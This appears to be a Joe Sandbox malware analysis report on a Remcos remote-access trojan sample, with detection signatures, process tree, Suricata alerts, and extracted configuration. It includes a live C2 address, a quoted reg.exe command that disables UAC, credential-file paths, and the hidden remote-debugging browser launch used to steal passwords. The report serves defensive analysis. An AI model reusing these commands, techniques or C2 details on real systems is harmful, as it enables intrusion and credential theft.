Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe

Overview

General Information

Sample name:17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Analysis ID:1584334
MD5:41496241ae1ad7c561d749f7d479caff
SHA1:e2935d471b03f8efc40460d29e2c07ee5a26f8de
SHA256:ad4a934328e699a5065c7c55ab3399d74134b5e97401175948b5296faf98d2a8
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe" MD5: 41496241AE1AD7C561D749F7D479CAFF)
    • chrome.exe (PID: 5388 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3060 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 7868 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 8064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • msedge.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x146f8:$a1: Remcos restarted by watchdog!
                • 0x14c70:$a3: %02i:%02i:%02i:%03i
                Click to see the 21 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6aaf8:$a1: Remcos restarted by watchdog!
                      • 0x6b070:$a3: %02i:%02i:%02i:%03i
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x64e04:$str_b2: Executing file:
                      • 0x65c3c:$str_b3: GetDirectListeningPort
                      • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x65780:$str_b7: \update.vbs
                      • 0x64e2c:$str_b9: Downloaded file:
                      • 0x64e18:$str_b10: Downloading file:
                      • 0x64ebc:$str_b12: Failed to upload file:
                      • 0x65c04:$str_b13: StartForward
                      • 0x65c24:$str_b14: StopForward
                      • 0x656d8:$str_b15: fso.DeleteFile "
                      • 0x6566c:$str_b16: On Error Resume Next
                      • 0x65708:$str_b17: fso.DeleteFolder "
                      • 0x64eac:$str_b18: Uploaded file:
                      • 0x64e6c:$str_b19: Unable to delete:
                      • 0x656a0:$str_b20: while fso.FileExists("
                      • 0x65349:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 25 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Browser Started with Remote Debugging
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, ParentProcessId: 1220, ParentProcessName: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 5388, ProcessName: chrome.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-05T08:39:01.391447+010020365941Malware Command and Control Activity Detected192.168.2.649709195.133.78.187346TCP
                      2025-01-05T08:39:02.625764+010020365941Malware Command and Control Activity Detected192.168.2.649711195.133.78.187346TCP
                      2025-01-05T08:39:02.625991+010020365941Malware Command and Control Activity Detected192.168.2.649710195.133.78.187346TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-05T08:39:03.736476+010028033043Unknown Traffic192.168.2.649712178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAvira: detected
                      Found malware configuration
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Multi AV Scanner detection for submitted file
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeVirustotal: Detection: 75%Perma Link
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeReversingLabs: Detection: 71%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Machine Learning detection for sample
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043294A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,4_2_00404423
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2400e094-f

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49853 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50069 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50070 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50071 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50072 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50073 version: TLS 1.2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_028310F1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02836580 FindFirstFileExA,0_2_02836580
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_10005C00
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_10007E20
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,0_2_100073F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10018AD0 FindFirstFileExA,0_2_10018AD0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
